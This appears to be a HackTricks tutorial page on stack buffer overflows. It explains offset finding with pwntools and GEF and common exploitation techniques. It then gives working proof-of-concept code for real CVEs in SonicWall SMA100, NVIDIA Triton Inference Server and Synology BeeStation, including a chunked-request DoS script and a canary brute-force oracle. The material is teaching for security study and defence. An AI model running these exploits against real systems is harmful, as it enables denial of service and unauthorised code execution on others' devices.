Stack Overflow

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

What is a Stack Overflow

A stack overflow is a vulnerability that occurs when a program writes more data to the stack than it is allocated to hold. This excess data will overwrite adjacent memory space, leading to the corruption of valid data, control flow disruption, and potentially the execution of malicious code. This issue often arises due to the use of unsafe functions that do not perform bounds checking on input.

The main problem of this overwrite is that the saved instruction pointer (EIP/RIP) and the saved base pointer (EBP/RBP) to return to the previous function are stored on the stack. Therefore, an attacker will be able to overwrite those and control the execution flow of the program.

The vulnerability usually arises because a function copies inside the stack more bytes than the amount allocated for it, therefore being able to overwrite other parts of the stack.

Some common functions vulnerable to this are: strcpy, strcat, sprintf, gets… Also, functions like fgets , read & memcpy that take a length argument, might be used in a vulnerable way if the specified length is greater than the allocated one.

For example, the following functions could be vulnerable:

void vulnerable() {
    char buffer[128];
    printf("Enter some text: ");
    gets(buffer); // This is where the vulnerability lies
    printf("You entered: %s\n", buffer);
}

Finding Stack Overflows offsets

The most common way to find stack overflows is to give a very big input of As (e.g. python3 -c 'print("A"*1000)') and expect a Segmentation Fault indicating that the address 0x41414141 was tried to be accessed.

Moreover, once you found that there is Stack Overflow vulnerability you will need to find the offset until it’s possible to overwrite the return address, for this it’s usually used a De Bruijn sequence. Which for a given alphabet of size k and subsequences of length n is a cyclic sequence in which every possible subsequence of length n appears exactly once as a contiguous subsequence.

This way, instead of needing to figure out which offset is needed to control the EIP by hand, it’s possible to use as padding one of these sequences and then find the offset of the bytes that ended overwriting it.

It’s possible to use pwntools for this:

from pwn import *

# Generate a De Bruijn sequence of length 1000 with an alphabet size of 256 (byte values)
pattern = cyclic(1000)

# This is an example value that you'd have found in the EIP/IP register upon crash
eip_value = p32(0x6161616c)
offset = cyclic_find(eip_value)  # Finds the offset of the sequence in the De Bruijn pattern
print(f"The offset is: {offset}")

or GEF:

#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp

Exploiting Stack Overflows

During an overflow (supposing the overflow size if big enough) you will be able to overwrite values of local variables inside the stack until reaching the saved EBP/RBP and EIP/RIP (or even more).
The most common way to abuse this type of vulnerability is by modifying the return address so when the function ends the control flow will be redirected wherever the user specified in this pointer.

However, in other scenarios maybe just overwriting some variables values in the stack might be enough for the exploitation (like in easy CTF challenges).

Ret2win

In this type of CTF challenges, there is a function inside the binary that is never called and that you need to call in order to win. For these challenges you just need to find the offset to overwrite the return address and find the address of the function to call (usually ASLR would be disabled) so when the vulnerable function returns, the hidden function will be called:

Ret2win

Stack Shellcode

In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:

Stack Shellcode

Windows SEH-based exploitation (nSEH/SEH)

On 32-bit Windows, an overflow may overwrite the Structured Exception Handler (SEH) chain instead of the saved return address. Exploitation typically replaces the SEH pointer with a POP POP RET gadget and uses the 4-byte nSEH field for a short jump to pivot back into the large buffer where shellcode lives. A common pattern is a short jmp in nSEH that lands on a 5-byte near jmp placed just before nSEH to jump hundreds of bytes back to the payload start.

Windows Seh Overflow

ROP & Ret2… techniques

This technique is the fundamental framework to bypass the main protection to the previous technique: No executable stack (NX). And it allows to perform several other techniques (ret2lib, ret2syscall…) that will end executing arbitrary commands by abusing existing instructions in the binary:

ROP & JOP

Heap Overflows

An overflow is not always going to be in the stack, it could also be in the heap for example:

Heap Overflow

Types of protections

There are several protections trying to prevent the exploitation of vulnerabilities, check them in:

Common Binary Exploitation Protections & Bypasses

Real-World Example: CVE-2025-40596 (SonicWall SMA100)

A good demonstration of why sscanf should never be trusted for parsing untrusted input appeared in 2025 in SonicWall’s SMA100 SSL-VPN appliance.
The vulnerable routine inside /usr/src/EasyAccess/bin/httpd attempts to extract the version and endpoint from any URI that begins with /__api__/:

char version[3];
char endpoint[0x800] = {0};
/* simplified proto-type */
sscanf(uri, "%*[^/]/%2s/%s", version, endpoint);

The first conversion (%2s) safely stores two bytes into version (e.g. "v1").
The second conversion (%s) has no length specifier, therefore sscanf will keep copying until the first NUL byte.
Because endpoint is located on the stack and is 0x800 bytes long, providing a path longer than 0x800 bytes corrupts everything that sits after the buffer ‑ including the stack canary and the saved return address.

A single-line proof-of-concept is enough to trigger the crash before authentication:

import requests, warnings
warnings.filterwarnings('ignore')
url = "https://TARGET/__api__/v1/" + "A"*3000
requests.get(url, verify=False)

Even though stack canaries abort the process, an attacker still gains a Denial-of-Service primitive (and, with additional information leaks, possibly code-execution).

Real-World Example: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server)

NVIDIA’s Triton Inference Server (≤ v25.06) contained multiple stack-based overflows reachable through its HTTP API.
The vulnerable pattern repeatedly appeared in http_server.cc and sagemaker_server.cc:

int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0);
if (n > 0) {
    /* allocates 16 * n bytes on the stack */
    struct evbuffer_iovec *v = (struct evbuffer_iovec *)
        alloca(sizeof(struct evbuffer_iovec) * n);
    ...
}

evbuffer_peek (libevent) returns the number of internal buffer segments that compose the current HTTP request body.
Each segment causes a 16-byte evbuffer_iovec to be allocated on the stack via alloca() – without any upper bound.
By abusing HTTP chunked transfer-encoding, a client can force the request to be split into hundreds-of-thousands of 6-byte chunks ("1\r\nA\r\n"). This makes n grow unbounded until the stack is exhausted.

Proof-of-Concept (DoS)

Chunked DoS PoC

#!/usr/bin/env python3
import socket, sys

def exploit(host="localhost", port=8000, chunks=523_800):
    s = socket.create_connection((host, port))
    s.sendall((
        f"POST /v2/models/add_sub/infer HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Content-Type: application/octet-stream\r\n"
        "Inference-Header-Content-Length: 0\r\n"
        "Transfer-Encoding: chunked\r\n"
        "Connection: close\r\n\r\n"
    ).encode())

    for _ in range(chunks):                  # 6-byte chunk ➜ 16-byte alloc
        s.send(b"1\r\nA\r\n")            # amplification factor ≈ 2.6x
    s.sendall(b"0\r\n\r\n")               # end of chunks
    s.close()

if __name__ == "__main__":
    exploit(*sys.argv[1:])

A ~3 MB request is enough to overwrite the saved return address and **crash** the daemon on a default build.

Real-World Example: CVE-2025-12686 (Synology BeeStation Bee-AdminCenter)

Synacktiv’s Pwn2Own 2025 chain abused a pre-auth overflow in SYNO.BEE.AdminCenter.Auth on port 5000. AuthManagerImpl::ParseAuthInfo Base64-decodes attacker input into a 4096-byte stack buffer but wrongly sets decoded_len = auth_info->len. Because the CGI worker forks per request, every child inherits the parent’s stack canary, so one stable overflow primitive is enough to both corrupt the stack and leak all required secrets.

Base64-decoded JSON as a structured overflow

The decoded blob must be valid JSON and include "state" and "code" keys; otherwise, the parser throws before the overflow is useful. Synacktiv solved this by Base64-encoding a payload that decodes to JSON, then a NUL byte, then the overflow stream. strlen(decoded) stops at the NUL so parsing succeeds, but SLIBCBase64Decode already overwrote the stack past the JSON object, covering the canary, saved RBP, and return address.

pld  = b'{"code":"","state":""}\x00'  # JSON accepted by Json::Reader
pld += b"A"*4081                              # reach the canary slot
pld += marker_bytes                            # guessed canary / pointer data
send_request(pld)

Crash-oracle bruteforcing of canaries & pointers

synoscgi forks once per HTTP request, so all children share the same canary, stack layout, and PIE slide. The exploit treats the HTTP status code as an oracle: a 200 response means the guessed byte preserved the stack, while 502 (or a dropped connection) means the process crashed. Brute-forcing each byte serially recovers the 8-byte canary, a saved stack pointer, and a return address inside libsynobeeadmincenter.so:

def bf_next_byte(prefix):
    for guess in range(0x100):
        try:
            if send_request(prefix + bytes([guess])).status_code == 200:
                return bytes([guess])
        except requests.exceptions.ReadTimeout:
            continue
    raise RuntimeError("oracle lost sync")

bf_next_ptr simply calls bf_next_byte eight times while appending the confirmed prefix. Synacktiv parallelized these oracles with ~16 worker threads, reducing the total leak time (canary + stack ptr + lib base) to under three minutes.

From leaks to ROP & execution

Once the library base is known, common gadgets (pop rdi, pop rsi, mov [rdi], rsi; xor eax, eax; ret) build an arb_write primitive that stages /bin/bash, -c, and the attacker command on the leaked stack address. Finally, the chain sets up the calling convention for SLIBCExecl (a BeeStation wrapper around execl(2)), yielding a root shell without needing a separate info-leak bug.

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.